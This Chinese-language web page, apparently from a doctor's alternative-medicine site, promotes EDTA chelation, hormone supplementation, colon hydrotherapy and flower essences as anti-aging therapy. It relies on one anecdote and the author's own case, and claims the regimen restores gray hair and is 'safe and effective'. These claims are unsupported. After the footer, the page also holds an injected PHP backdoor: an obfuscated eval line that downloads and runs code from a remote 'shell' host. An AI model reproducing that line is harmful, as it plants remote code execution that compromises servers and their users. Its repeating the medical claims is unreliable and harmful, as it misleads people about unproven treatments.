收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 螯合療法與抗老化
螯合療法與抗老化 列印 E-mail

       我將螯合療法整合其他另類療法,成為「抗衰老」的完美組合,讓人們不只可以保健、養生,還可以讓人從裡到外抗老化、變年輕,我覺得這才是醫學科技的極致表現。

抗老化得長期作戰

        「抗老化」應該是一個醫療行為的結果,是一個完美醫療養生保健行為的附加價值,而不該是醫療行為的目的。若將「抗老化」當成商業行為,那在強調「抗老化」的任何醫療行為上,必定會使用過多的劑量;因為「真正的抗老化」是長期醫療養生保健的結果,而非一蹴可及。
        健保制度壓縮了醫師們生存的空間,所以各型醫療院所包括:婦產科、皮膚科、耳鼻喉科、眼科……等,紛紛推出了各種自費市場,而最大宗的莫過於「抗老化」與「減肥」。以抗衰老而言,確實不容易下定義,因此大多數人都以看起來「變年輕了」,做為「抗衰老」是否有效的指標。依此標準,最容易達到效果的非「整形外科」與「皮膚科」莫屬,但它們都是僅止於外表的改變,非涉及人體內在器官、組織或細胞的活化,這也是醫病雙方都有的共識。

荷爾蒙施作不可過量

        在另類醫學中最能被主流醫學接受的「抗衰老療法」是「荷爾蒙療法」(Hormone Replacement Therapy )。使用最主力的荷爾蒙為生長激(HGH),再加上甲狀腺荷爾蒙、女性與男性荷爾蒙(動情激素、睪固酮)以及EPA、DHEA…等。若欲在短時間內就看見變年輕的效果,勢必會使用過量的荷爾蒙,破壞人體自身荷爾蒙的平衡,造成嚴重的副作用。
        在治療疾病的原則下,正確補充人體缺乏的荷爾蒙,不易在短期內看到外貌變年輕的效果,當然就沒有市場性,所以「荷爾蒙療法」勢必變成從事此療法「醫師道德良知」與「患者對抗衰老認知程度」平衡的拉鋸戰。所謂「荷爾蒙療法」(HRT)應該補充的荷爾蒙劑量,應該是小於患者所欠缺的劑量,非足量,更非過量;因為人體荷爾蒙的正常值是統計學的數值,變異非常大,若以「抗衰老」為目的,想要達到消費者的願望──很快的看起來變年輕,這時候使用的「荷爾蒙療法」就容易補充過量,可能造成人體細胞變性,導致惡性腫瘤。
        如果能正確補充少量患者所缺乏的荷爾蒙,再合併使用一些另類醫學的項目,諸如:螯合療法、營養療法、醫學芳香療法、中醫藥、大腸水療…..等,必然能使患者更健康,進而提升其生活品質,長久之後就能達到真正「抗老化」的結果。

螯合療法抗老化既安全又有效

        除了荷爾蒙療法外,既安全又有效的抗老化療法,非EDTA螯合療法莫屬。我們來看一個Dr.Cranton所提供的實例:西元一九八一年,七十歲的貝絲太太被女兒帶到診所,在初診病歷上幾乎填滿了所有的項目,包括兩次心臟病發作、支氣管氣喘和肺氣腫引發的慢性肺炎、心臟衰竭、嚴重的骨關節炎、胸腔和腿疼痛、骨質疏鬆、白內障、失眠和健忘。「我甚至會忘了我女兒叫什麼名字!」貝絲太太哭訴。
        她的女兒則表示,所有主流醫學的醫療和藥物雖然改善了母親某方面的症狀,但往往又替她帶來新的問題,似乎只是增加了她的負擔,並加重她的病情。「每一個醫生都告訴我,媽媽因為老化的緣故,健康正在走下坡,過不了多久,她會需要一位看護。」女兒焦急地說。
        老實說,所有的醫藥只能醫治生命,不能抗拒生命自然的衰老和死亡,螯合療法也不例外!而且醫生多半不喜歡醫治年老的患者,因為他們的變異性實在太難掌握;但Dr. Cranton還是想試試看,希望能改善貝絲太太的生活狀況。
於是在西元一九八一年,Dr. Cranton在十週內替貝絲太太進行了二十次螯合療法。神奇的是,貝絲開始能自己料理家務,甚至烹煮火雞餐並邀請朋友來慶祝感恩節,所有的親戚、朋友都驚訝地談論著貝絲的恢復,彷彿時光倒退了二十年一般。
        這並非神話,螯合療法對於治療類似的老化疾病有跡可尋,因為血管內皮細胞損傷造成血管功能失常,是動脈硬化的主因,如果血管壁恢復健康與彈性,膽固醇、血脂…等就不易附著。重金屬若積存體內,會造成血管內皮細胞損傷,導致動脈硬化。所以清除體內重金屬,可以改善血管內皮細胞並恢復血管壁的彈性,有效改善任何具有血管的器官功能;器官功能一旦獲得改善,必能減少老化疾病的發生!在螯合療法施作時,我同時也提供了很多的營養素,如維他命、胺基酸、抗氧化劑、微量元素、礦物質…等,當然就可以延緩老化。因此,「螯合療法」輔助以「營養療法」或稱之為「幹細胞理論療法」,就是「抗衰老」最基礎的、最根本的療法。

身體外貌都變年輕了

        在我的臨床個案中,有許多接受螯合療法來預防疾病的人,都明顯地「變年輕」了,我自己就是最好的例子。因為改善了循環,並減少因身體不適所引起的焦躁和易怒,便會連帶降低自由基活動所產生的皺紋,同時還會減緩掉髮的數量,甚至是使已灰白的頭髮回復原來應有的髮色;另外,因細胞廢物積存在體內所引發的老人斑、皮膚乾燥粗糙等,也會慢慢的變淡終至消失,效果比市面上任何標榜美容的產品都要好。
        我整合各種另類療法,幫助許多人在治病過程中,同時達到抗老化的效果,其原因在於:「螯合療法」清除體內重金屬,「營養療法」補充人體所需的維他命、礦物質、胺基酸、微量元素、抗氧化劑…等,讓體內存在的幹細胞,得到充足的營養素,使受損的組織與器官修復與再生;用「荷爾蒙療法」依個人不同需求補充微量荷爾蒙;「醫學芳香療法」讓人放鬆肌肉與情緒,與中醫經絡理論結合,更可達到人體五臟六腑均衡發展的目的。運用「中西醫整合療法」可治療與平衡人體不同的疾病症狀,如血壓、血糖、血脂…等的穩定狀態;強化肝腎功能,以代謝各種農藥、化學肥料、食品添加物、外用或內服的生化產品..等化學毒素;「花精療法」可以平衡人們不同的負面情緒,改變負向人格,促進心理健康……等。其實這些療法都是「抗衰老」非常重要的一環!若能併用前述各種醫療保健方法,讓人從裡到外「抗老化」,才是醫學科技的極致表現。

 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));